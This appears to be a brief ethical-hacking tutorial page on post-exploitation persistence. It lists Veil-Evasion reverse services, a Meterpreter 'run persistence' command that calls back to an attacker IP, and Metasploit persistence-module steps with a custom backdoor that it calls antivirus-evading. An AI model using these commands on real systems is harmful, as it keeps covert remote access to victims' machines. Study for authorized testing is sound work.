Ethical Hacking - POST EXPLOITATION(2)

MAINTAINING ACCESS - Methods

1. Using a veil-evasion

  • Rev_http_service
  • Rev_tcp_service
  • Use it instead of a normal backdoor.
  • Or upload and execute from meterpreter.
  • Does not always work.

2. Using persistence module

  • run persistence -h
  • Detectable by antivirus programs.

Ethical Hacking - POST EXPLOITATION(2)

run persistence -U -i 20 -p 80 -r 10.0.0.43

 

3. Using Metasploit + veil-evasion -> More robust + undetectable by Antivirus

  • > use exploit/windows/local/persistence

Ethical Hacking - POST EXPLOITATION(2)

  • > set session [session id]

Ethical Hacking - POST EXPLOITATION(2)

  • > set exe::custom[backdoor location]

Ethical Hacking - POST EXPLOITATION(2)

  • >exploit

 

上一篇:新的开源组织成立:道德治理,人类*大于软件*


下一篇:Java printf()占位符